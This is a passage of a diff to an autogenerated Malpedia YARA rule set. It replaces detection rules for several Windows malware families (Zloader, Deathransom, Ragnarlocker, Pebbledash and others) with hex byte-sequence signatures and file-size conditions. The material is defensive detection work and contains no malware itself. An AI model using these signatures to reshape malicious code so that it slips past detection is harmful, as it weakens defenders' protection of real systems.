+		$sequence_6 = { 8b04950028a900 f644180448 7452 6a0a 58 6a0d 663945f8 }
+		$sequence_7 = { 85c0 770a 7204 3bd3 7304 8bd9 2bdf }
+		$sequence_8 = { 0f85ea000000 68???????? ba48162d71 8bce e8???????? 83c404 85c0 }
+		$sequence_9 = { 8b7c2418 85c0 0f84a0000000 8d4c2420 51 50 6a00 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 917504
 }
-rule MALPEDIA_Win_Obscene_Auto : FILE
+rule MALPEDIA_Win_Zloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d248edfb-cd2d-59a2-b789-bf38244829c1"
+		id = "178c70de-c326-5e7a-939c-09ed0c73d1dc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.obscene_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zloader_auto.yar#L1-L424"
 		license_url = "N/A"
-		logic_hash = "39a0d4041b2cc668b4ace8ad4daf4cef6d2ee34b044053350de4964082b18c2d"
+		logic_hash = "f3602cbba95531e02ba22e89ac5b5e6174a07dbda34c6d28cb18aded5d257e41"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118602,32 +119047,69 @@ rule MALPEDIA_Win_Obscene_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 68ff000000 ff15???????? 8d8500ffffff 50 68???????? }
-		$sequence_1 = { 6aff ff15???????? 68???????? ff75f8 }
-		$sequence_2 = { 0fbe00 83f830 7c0b 8b45f8 }
-		$sequence_3 = { 6828431010 68e4401010 e8???????? 59 59 682c431010 }
-		$sequence_4 = { 6a06 68???????? ff35???????? 6aff ff15???????? 68???????? }
-		$sequence_5 = { eb61 68???????? 68???????? 68???????? e8???????? 83c40c 68???????? }
-		$sequence_6 = { ff15???????? 59 59 85c0 752f ff7508 68???????? }
-		$sequence_7 = { ff75ee ff15???????? 0fb7c0 83f819 }
-		$sequence_8 = { c605????????68 c705????????d15aaa00 c605????????c3 8d45fc 50 6a06 }
-		$sequence_9 = { 51 51 8d45f8 50 6a06 68???????? ff35???????? }
+		$sequence_0 = { 0fb7c0 57 50 53 e8???????? 83c40c }
+		$sequence_1 = { 6aff ff7514 e8???????? 83c40c 84c0 7424 }
+		$sequence_2 = { 0fb7450c 8d9df0feffff 53 50 ff7508 e8???????? 83c40c }
+		$sequence_3 = { 31db 89d8 83c40c 5e 5b }
+		$sequence_4 = { 6a00 e8???????? 83c408 ff75f0 }
+		$sequence_5 = { 7420 e8???????? 84c0 7417 e8???????? }
+		$sequence_6 = { 31db 8d8df0feffff e8???????? 89d8 81c404010000 }
+		$sequence_7 = { 50 ff7508 53 e8???????? 83c40c 66c7047b0000 }
+		$sequence_8 = { 56 50 a1???????? 89c1 }
+		$sequence_9 = { e8???????? 89c1 89f0 99 f7f9 }
+		$sequence_10 = { e8???????? eb00 eb00 eb00 eb00 eb00 eb00 }
+		$sequence_11 = { e8???????? 83f800 0f94c0 2401 }
+		$sequence_12 = { e8???????? a801 7502 eb0f }
+		$sequence_13 = { e8???????? 0fb700 3d64860000 0f94c0 2401 }
+		$sequence_14 = { e8???????? ffd0 488905???????? b001 2401 0fb6c0 }
+		$sequence_15 = { e8???????? 88c1 31c0 f6c101 }
+		$sequence_16 = { 41b802000000 e8???????? a801 7505 e9???????? }
+		$sequence_17 = { e8???????? 59 84c0 7432 68???????? }
+		$sequence_18 = { 84c0 7432 68???????? ff742408 e8???????? 59 }
+		$sequence_19 = { 8bc3 5b c3 8b44240c 83f8ff 750a }
+		$sequence_20 = { 57 56 50 8b4510 31db }
+		$sequence_21 = { 89542444 e8???????? 03c0 6689442438 8b442438 }
+		$sequence_22 = { 6aff 50 e8???????? 8d857cffffff 50 }
+		$sequence_23 = { 50 56 56 56 ff7514 }
+		$sequence_24 = { 5f c6043000 5e c3 56 57 8b7c2414 }
+		$sequence_25 = { 6689442438 8b442438 83c002 668944243a }
+		$sequence_26 = { e8???????? 83c414 c3 56 ff742410 }
+		$sequence_27 = { 50 8d44243c 99 52 50 }
+		$sequence_28 = { 83c410 84c0 741f 8b45c8 3b4604 7617 }
+		$sequence_29 = { 81c614010000 8dbd78feffff f3a5 8d8578feffff 50 ff75fc 66a5 }
+		$sequence_30 = { 89e5 53 57 56 81eca8020000 }
+		$sequence_31 = { c7460488130000 c7462401000000 c7462800004001 e8???????? }
+		$sequence_32 = { 57 56 83ec18 89d6 89cf }
+		$sequence_33 = { 890424 c74424041c010000 e8???????? c74424101c010000 893424 }
+		$sequence_34 = { 8d742410 89b42430010000 8b842430010000 8b842430010000 890424 }
+		$sequence_35 = { 8945ec 890424 e8???????? 8945f0 }
+		$sequence_36 = { 57 50 e8???????? 68???????? 56 e8???????? }
+		$sequence_37 = { 56 57 ff750c 33db 68???????? 6880000000 }
+		$sequence_38 = { c3 8bc2 ebf7 8d442410 50 ff742410 }
+		$sequence_39 = { 33db 68???????? 6880000000 50 e8???????? 83c410 8d4580 }
+		$sequence_40 = { 68???????? ff742410 e8???????? 6823af2930 56 ff742410 }
+		$sequence_41 = { e8???????? ff7508 8d85f0fdffff 68???????? 6804010000 }
+		$sequence_42 = { e8???????? 83c40c 5e 8bc3 5b c3 8b4c2404 }
+		$sequence_43 = { c3 56 8b742408 6804010000 68???????? }
+		$sequence_44 = { c3 8bc2 ebf8 53 8b5c240c }
+		$sequence_45 = { 50 6a72 e8???????? 59 59 }
+		$sequence_46 = { 894c2424 890b 56 8944241c }
 
 	condition:
-		7 of them and filesize < 2170880
+		7 of them and filesize < 5360640
 }
-rule MALPEDIA_Win_Xiaoba_Auto : FILE
+rule MALPEDIA_Win_Adhubllka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8a2d4ebc-9dbe-5e06-9ffb-a1e3c148bd49"
+		id = "60da8c7f-6dd6-527d-a4d7-5811a92e6c32"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xiaoba_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.adhubllka_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "1a83b2fe247a6302b4c8d96b4dc9a08c1e85c028cd9a733963d489679c8b5b8d"
+		logic_hash = "f31f80e2e1b5812b9eab30806e14c5a9a3d65252ed9a183d7a41e8edbf56db58"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118641,32 +119123,32 @@ rule MALPEDIA_Win_Xiaoba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b801000000 85c0 0f840a000000 b88033e101 e9???????? 8b451c 8945f8 }
-		$sequence_1 = { 8b4f04 50 8d942494000000 50 52 50 8d442478 }
-		$sequence_2 = { 895c241c 8907 8b0d???????? 8d6e5c 894d00 899e94000000 c78690000000b8905f00 }
-		$sequence_3 = { 8a1e 84db 7403 c60600 57 51 e8???????? }
-		$sequence_4 = { 8b8f80000000 8bc2 894d08 8b4e28 83c004 3bc1 7607 }
-		$sequence_5 = { 52 50 6a00 8b7c2454 8b4d04 57 6a00 }
-		$sequence_6 = { 85c0 0f8407040000 8b6e34 85ed 0f84fc030000 8b4508 85c0 }
-		$sequence_7 = { 8b4e78 50 51 e8???????? 8b5634 83c408 }
-		$sequence_8 = { e8???????? 8b4c2414 83c404 85c9 8944241c 755c 50 }
-		$sequence_9 = { 8b942488000000 6a00 50 8b842480000000 53 56 50 }
+		$sequence_0 = { e8???????? 8d8dfcfcffff e8???????? 0f1085fcfcffff 8bd6 }
+		$sequence_1 = { 751e a1???????? 56 ffd0 33c0 5f }
+		$sequence_2 = { 50 ff5150 85c0 0f8804010000 }
+		$sequence_3 = { 8b8534ffffff 03c2 33f8 c1c710 03cf 33d1 c1c20c }
+		$sequence_4 = { 50 6af6 ff15???????? 8b04bd68b34100 834c0318ff 33c0 eb16 }
+		$sequence_5 = { 660ffea530ffffff 660fefc8 8345f010 0f28d4 0f1108 8b45fc }
+		$sequence_6 = { 8945dc 8b458c 03c7 c1c207 8bc8 334d84 c1c110 }
+		$sequence_7 = { 8d041e c1c007 33458c 8d3403 c1c609 }
+		$sequence_8 = { 0fbe05???????? c1e208 0bd0 c745d4bbaaffee 0fbe05???????? c1e208 0bd0 }
+		$sequence_9 = { 0f28a570feffff 0f1000 8b45f0 660ffea530ffffff 660fefc8 8345f010 0f28d4 }
 
 	condition:
-		7 of them and filesize < 5177344
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Balkan_Door_Auto : FILE
+rule MALPEDIA_Win_Deathransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "870a99c0-e95d-56d4-9ce7-fd5381768dbe"
+		id = "a114591a-b780-5a40-a9ea-b0c6b9cb905d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.balkan_door_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.deathransom_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "1cfcbe46433533ae63497a1399949fc7dd10f1e5a4dc1daebcdead984fa82911"
+		logic_hash = "51420be8374b7a80642a50bf14b9acdb6936ed5b62767040db7c66a1d7ee7900"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118680,32 +119162,32 @@ rule MALPEDIA_Win_Balkan_Door_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 ffd7 5e 32c0 5f c3 32c0 }
-		$sequence_1 = { c785ccfdffff00000000 50 56 c785d0fdffff2c020000 ff15???????? }
-		$sequence_2 = { ff15???????? 8bf8 89bd3cefffff 85ff }
-		$sequence_3 = { 8be5 5d c3 8d85d0fdffff c785ccfdffff00000000 50 56 }
-		$sequence_4 = { 85f6 740b 6a00 6a00 56 ff15???????? 57 }
-		$sequence_5 = { 6a01 6a02 6a10 6a04 68???????? }
-		$sequence_6 = { 6a00 56 ff15???????? 57 8b3d???????? ffd7 85f6 }
-		$sequence_7 = { c3 8d85d0fdffff c785ccfdffff00000000 50 56 }
-		$sequence_8 = { ffd7 6a00 ff35???????? ffd3 85c0 }
-		$sequence_9 = { 52 50 ff15???????? 8bf8 89bd3cefffff 85ff }
+		$sequence_0 = { 7508 4e 83e804 85f6 7ff3 5f }
+		$sequence_1 = { 2345e8 8b5dd8 0bd8 03d9 8b4d88 8bd1 895dd8 }
+		$sequence_2 = { 03ca 8d5601 3bcf 8bc1 0f42d6 8b75e0 2bc7 }
+		$sequence_3 = { c1e803 33c8 8b5df8 03d1 8bc7 0355c8 8bcf }
+		$sequence_4 = { 8d8d90fdffff e8???????? 6a50 8d8590fdffff 50 8d8578feffff 50 }
+		$sequence_5 = { 035594 8bc7 c1c807 33c8 8bc7 c1e803 33c8 }
+		$sequence_6 = { 81c2fc6d2c4d 03d0 8b45ec 8bc8 03da c1c00a c1c90d }
+		$sequence_7 = { 6880000000 8d8538ffffff 50 ffd1 808d38ffffffc0 8d8538ffffff 804db701 }
+		$sequence_8 = { 57 894df8 c745fc00000000 8975f0 895d0c 8b02 8bfe }
+		$sequence_9 = { 0fafc3 2bf8 8d87ffff0000 8945fc 3bc1 720a }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 133120
 }
-rule MALPEDIA_Win_Phoreal_Auto : FILE
+rule MALPEDIA_Win_Lambload_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9354abd9-a851-5d8e-a424-1be008c5ab6c"
+		id = "8b136788-015d-54fc-bdcb-34985ee91d28"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phoreal_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lambload_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "904dd636d7db526ab8a0410c75a52ee0fac4292f0f4ce7ff0cd1d42961fa831e"
+		logic_hash = "360d04776b8fecec7b17892571b2e470304fba03fb5a7a2f8f66e392936ecb21"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118719,32 +119201,32 @@ rule MALPEDIA_Win_Phoreal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8b4b64 8d542418 52 8b5054 }
-		$sequence_1 = { 8bf8 8d4dd4 3bcf 7465 837de808 720c 8b55d4 }
-		$sequence_2 = { 8b1d???????? 8b4510 8b4d0c 50 8b4508 56 8d140f }
-		$sequence_3 = { e8???????? 837dc808 8b45b4 7302 8bc7 50 6a00 }
-		$sequence_4 = { 8bec 83ec38 56 8b7508 8b4660 }
-		$sequence_5 = { 0f8460feffff ff432c 8b432c 8b7c2418 89442450 33c0 89442454 }
-		$sequence_6 = { ff15???????? 8d8578ffffff 50 8d4de0 51 }
-		$sequence_7 = { 50 ffd6 85c0 7527 ff15???????? 3d0f000980 0f85cb010000 }
-		$sequence_8 = { d1e8 8d1443 53 8db590feffff e8???????? 8bf8 8db550ffffff }
-		$sequence_9 = { 85c0 7422 8b17 8910 8b4f04 894804 8b5708 }
+		$sequence_0 = { e8???????? 83c408 85c0 7510 8b442414 c780a400000010260310 eb67 }
+		$sequence_1 = { 33c9 0fbe9930670610 3bfb 7408 }
+		$sequence_2 = { 5b 3bfb 7d1c 2bdf }
+		$sequence_3 = { 8b6c2424 83c408 3be8 7e02 8be8 }
+		$sequence_4 = { 85db 56 751a 6a62 68???????? }
+		$sequence_5 = { 50 e8???????? ff33 ffb5f0f5ffff }
+		$sequence_6 = { eb16 8d8be8330710 6a0a 8d542424 51 52 e8???????? }
+		$sequence_7 = { 75d7 6a03 5b 3bfb 7d1c 2bdf }
+		$sequence_8 = { 85c0 7529 0fb78c05ecfbffff 66898c05f4fdffff 83c002 663bce }
+		$sequence_9 = { c1e106 030c9500490710 eb05 b9???????? f641247f 75a2 83f8ff }
 
 	condition:
-		7 of them and filesize < 622592
+		7 of them and filesize < 1039360
 }
-rule MALPEDIA_Win_Fishmaster_Auto : FILE
+rule MALPEDIA_Win_Flying_Dutchman_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c7f73382-0b3e-516e-ada8-2592a288859c"
+		id = "886d0773-9268-59b5-bd3b-294bdb3b9350"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fishmaster_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flying_dutchman_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "2d3700642fa743154e0272490d462793baad4e202db4b6b6f02f2c7c184ce851"
+		logic_hash = "db7ff3ab0ec7e2a2a2d94a46706f998e00b81b5002023e59f4f386401742ebb6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118758,34 +119240,34 @@ rule MALPEDIA_Win_Fishmaster_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 410fbe4c0101 8d41bf 3c19 7705 8d69bf eb28 }
-		$sequence_1 = { 4489442420 488bcb 488b4318 4883f810 7203 488b0b }
-		$sequence_2 = { 448d5701 4885c0 0f8e17030000 4d8bcc 4c89642428 448bac2498000000 }
-		$sequence_3 = { 7203 488b0b 488bd5 4889542438 }
-		$sequence_4 = { 8d41bf 41b83f000000 3c19 7706 448d61bf eb2b }
-		$sequence_5 = { 4533c9 33d2 458d4103 488d0dc51e0000 ff15???????? 4c89742438 488d4c2468 }
-		$sequence_6 = { 7705 8d71bf eb28 8d419f 3c19 }
-		$sequence_7 = { ff15???????? cc 4885c9 7407 e8???????? eb02 }
-		$sequence_8 = { 482bc5 4883c0f8 4883f81f 7607 ff15???????? }
-		$sequence_9 = { 4883f801 721c 488d4101 48894310 4883fa10 488bc3 7203 }
+		$sequence_0 = { 83f911 770e 6a0d 58 5d c3 8b04cd94b00110 }
+		$sequence_1 = { ffb564deffff ff15???????? 85c0 7459 8b8568deffff 3bc3 744f }
+		$sequence_2 = { 48 83c8fc 40 83f801 0f85d3000000 c747140f000000 }
+		$sequence_3 = { 8bec 81ecc8000000 a1???????? 33c5 8945fc 8d8538ffffff }
+		$sequence_4 = { 83c8ff eb03 0345ec 8b4dfc 33cd e8???????? c9 }
+		$sequence_5 = { 8d42e0 3c58 770f 0fbec2 0fbe80486e0110 }
+		$sequence_6 = { e8???????? c9 c20800 55 8bec 81ec38040000 a1???????? }
+		$sequence_7 = { 57 8985e4fdffff 8935???????? e8???????? 8b35???????? 33ff }
+		$sequence_8 = { 56 8b7508 57 bbc8000000 53 6a00 bf???????? }
+		$sequence_9 = { 8d442410 89742408 8d4802 668b10 83c002 6685d2 75f5 }
 
 	condition:
-		7 of them and filesize < 812032
+		7 of them and filesize < 276480
 }
-rule MALPEDIA_Win_Redcurl_Auto : FILE
+rule MALPEDIA_Win_Pebbledash_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fbb544b7-c5e6-54a1-8421-fdb6aeb04e0b"
+		id = "32b0f21d-5afa-53d6-93e7-29fbd519196d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redcurl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redcurl_auto.yar#L1-L212"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pebbledash_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "69ca0c8cf976224bed2624627972f08d1882150471e8a73b5314d8faac0d77d8"
+		logic_hash = "9344c4ac60887a4e00c22de66e7202e2f1a072e514ea3fdd68e29205e525a98f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -118797,43 +119279,38 @@ rule MALPEDIA_Win_Redcurl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 99 b91a000000 f7f9 80c261 88143e 47 }
-		$sequence_1 = { 2bc6 48 50 56 }
-		$sequence_2 = { c745f000000000 ff15???????? 8bd0 c7461000000000 8bca c746140f000000 c60600 }
-		$sequence_3 = { 3bc2 0f42d0 0fb6041a 03d3 }
-		$sequence_4 = { 7541 d9ec d9c9 d9f1 833d????????00 0f856c090000 }
-		$sequence_5 = { 8bca c746140f000000 c60600 8d7901 0f1f440000 8a01 41 }
-		$sequence_6 = { c745fc00000000 c745c400000000 c745c80f000000 c645b400 }
-		$sequence_7 = { e8???????? 8d0c3e 83c40c 3bf1 }
-		$sequence_8 = { 51 e8???????? 83c408 85f6 7430 }
-		$sequence_9 = { c645d800 8d5001 8b4610 3bc2 726f 2bc2 83c9ff }
-		$sequence_10 = { 6a00 6aff 8bf8 6a00 }
-		$sequence_11 = { 51 03c2 8d4dd8 50 e8???????? 8d45d8 8bce }
-		$sequence_12 = { 0f57c0 c745e800000000 68???????? ba???????? 660fd645e0 e8???????? 83c404 }
-		$sequence_13 = { 89742404 893c24 e8???????? 85c0 0f85cdfeffff }
-		$sequence_14 = { 85c0 0f84c4000000 8b8d00ffffff 8945d0 }
-		$sequence_15 = { 89b548feffff 8b08 39d1 0f842f180000 }
-		$sequence_16 = { 7535 8938 83c41c 31c0 5b 5e }
-		$sequence_17 = { 83ec1c 8b31 8b7c2430 8b442434 8b5ef4 39df }
-		$sequence_18 = { 83fe0f 0f87f20e0000 83fe01 0f85150d0000 0fb617 889530ffffff }
-		$sequence_19 = { 895c2408 890424 89542404 e8???????? 8b5da8 }
-		$sequence_20 = { 0f8583f7ffff 8b4004 85c0 75e3 8b8310010000 8d5608 89442424 }
+		$sequence_0 = { 50 b9???????? e8???????? 85c0 7507 }
+		$sequence_1 = { 5e c3 55 8b6c2408 56 33f6 8b4d00 }
+		$sequence_2 = { e8???????? 33d2 b90e000000 f7f1 }
+		$sequence_3 = { 6829080000 68???????? 68???????? e8???????? 83c40c }
+		$sequence_4 = { 832000 a1???????? a3???????? c3 8b442404 a3???????? c3 }
+		$sequence_5 = { 894604 5e c3 55 8bec 833d????????00 750f }
+		$sequence_6 = { 8bc1 5b 5e 5f c9 c3 6a01 }
+		$sequence_7 = { e8???????? 6888130000 ff15???????? b9???????? e8???????? 68???????? e8???????? }
+		$sequence_8 = { 8905???????? 0fb64201 440bc0 0fb64202 41c1e008 440bc0 }
+		$sequence_9 = { e8???????? 488d542440 488bce ffd0 }
+		$sequence_10 = { 0bc8 0fb6420b c1e108 0bc8 41894e08 }
+		$sequence_11 = { 66420f6e4ccb10 4b8d0c5b 660f6e5ccb10 4183c308 4c8d0440 66420f6e54c310 8d47ff }
+		$sequence_12 = { 3008 488d4001 4883ea01 75f0 eb0c }
+		$sequence_13 = { 0bc8 0fb6420f c1e108 0bc8 41894e0c }
+		$sequence_14 = { 498bcc 85c0 7512 e8???????? }
+		$sequence_15 = { 41c1e008 8905???????? 0fb64201 440bc0 }
 
 	condition:
-		7 of them and filesize < 487424
+		7 of them and filesize < 677888
 }
-rule MALPEDIA_Win_Shylock_Auto : FILE
+rule MALPEDIA_Win_Xxmm_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "357a8098-efc5-5a49-a18b-d4d668276421"
+		id = "16a9d672-e06b-5e77-adaf-431f4123e535"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shylock_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xxmm_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "34460d345c77d949d300b4c007098ec528b095570601731f99128cb864a10989"
+		logic_hash = "c8c4a142f2bfee52addd60a0f4c2035a9a8040f793cfe3829a4504cc749982c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118847,32 +119324,32 @@ rule MALPEDIA_Win_Shylock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 b8???????? e8???????? 59 8bd8 51 54 }
-		$sequence_1 = { ffb0b0000000 ffb0ac000000 e8???????? 83c410 85c0 0f849a060000 833d????????01 }
-		$sequence_2 = { 8d85b0fdffff e8???????? 59 8b45fc 5f 5e 5b }
-		$sequence_3 = { 8d7318 e8???????? 8d7314 e8???????? 8d7310 e8???????? 8d730c }
-		$sequence_4 = { e8???????? 8d75e0 e8???????? 8d75ec e8???????? 8d75f4 e8???????? }
-		$sequence_5 = { 59 50 e8???????? 83c40c 8d75fc 8bf8 e8???????? }
-		$sequence_6 = { e9???????? 8b45f0 8d4de4 40 51 33d2 8d5df8 }
-		$sequence_7 = { e8???????? 59 833d????????00 74ef e9???????? 8b0d???????? 83b93401000001 }
-		$sequence_8 = { 8d75f0 e8???????? 8bc7 e8???????? 3c01 0f84d5020000 8d4dcc }
-		$sequence_9 = { 750a 6a01 8b7d88 e8???????? 0fb645e4 83f801 750a }
+		$sequence_0 = { 85c9 7451 53 56 57 }
+		$sequence_1 = { 0fb6d2 7206 8d7c17e0 eb02 }
+		$sequence_2 = { 8b4c111c 8d0481 8b0410 03c2 eb12 8b07 }
+		$sequence_3 = { 4f 81cf00ffffff 47 8d040f 0fb610 035510 81e2ff000080 }
+		$sequence_4 = { e8???????? 8d1c07 8b7320 8bcf e8???????? }
+		$sequence_5 = { 5b c3 53 8d5804 e8???????? ff33 }
+		$sequence_6 = { 8b440878 8b7c0820 8b540824 03f9 03d1 8955f8 }
+		$sequence_7 = { 0f8481000000 8b96a0000000 0355f8 8b4204 }
+		$sequence_8 = { 8b540e1c 8d0482 03c1 81fb8e4e0eec 7509 8b00 03c1 }
+		$sequence_9 = { 47 8d040f 0fb610 035510 }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Ragnarlocker_Auto : FILE
+rule MALPEDIA_Win_Electricfish_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2ac8a2eb-b248-5587-8704-788c5b75f23d"
+		id = "54f0ee66-bee9-5fd6-90c5-67fcbb00bae7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ragnarlocker_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.electricfish_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "a0b16ae3dec166e9354e89e87f8c27a6b4e207c9c50c554aa69c08f1891c036a"
+		logic_hash = "570c92a12a35054e6d1b5030b781194881d1880fcbe3006781ca116a918ce32a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118886,34 +119363,34 @@ rule MALPEDIA_Win_Ragnarlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 8b4dd4 8bf1 0fa4c119 c1ee07 c1e019 0bd1 }
-		$sequence_1 = { 33ff 33f6 66660f1f840000000000 8bc6 8a9c3500ffffff 33d2 0fb6cb }
-		$sequence_2 = { 317dc0 33f6 8b55f4 8bfa 8b4de8 }
-		$sequence_3 = { 57 ff15???????? 85c0 0f852cffffff 57 ff15???????? 6a28 }
-		$sequence_4 = { c1e108 0bc8 894b28 0fb64f13 0fb64712 c1e108 0bc8 }
-		$sequence_5 = { 234dac 33f1 8b45e4 8b4df0 03de 13fa 035d88 }
-		$sequence_6 = { 72f2 8b5df8 8b7df4 57 c6043900 ff15???????? 50 }
-		$sequence_7 = { 7cd8 ff75f8 ff15???????? 5f 5e b001 5b }
-		$sequence_8 = { 33f1 03d7 8b7df4 13fe 0355fc 8955e8 }
-		$sequence_9 = { 0fa4ca1e c1ef02 8975e8 33f6 0bf2 c1e11e 3175f4 }
+		$sequence_0 = { 4f 783b 8bff 0fbe5500 40 8d0cb6 45 }
+		$sequence_1 = { c3 8b4e0c 6a00 51 e8???????? 83c408 8b5608 }
+		$sequence_2 = { 85ff 7411 8bc5 2bc6 50 03ce }
+		$sequence_3 = { 39a8ac000000 0f84a8000000 80beed0a000000 89aef00a0000 0f8564040000 80beee0a000000 }
+		$sequence_4 = { 0f85b8000000 85db 0f8451040000 0fb638 40 4b 4e }
+		$sequence_5 = { e8???????? 8b561c 68???????? 52 e8???????? 6893010000 68???????? }
+		$sequence_6 = { e8???????? 8b4614 89780c 8b4b14 8b5110 52 e8???????? }
+		$sequence_7 = { e8???????? 83c418 85c0 0f8413030000 8b542410 52 8d442464 }
+		$sequence_8 = { 0f84d3000000 8b879c010000 3bc3 7417 50 e8???????? 83c404 }
+		$sequence_9 = { c3 8b8424a8000000 6a01 50 e8???????? 83c408 5b }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 3162112
 }
-rule MALPEDIA_Win_Trickbot_Auto : FILE
+rule MALPEDIA_Win_Taleret_Auto : FILE
 {
 	meta:
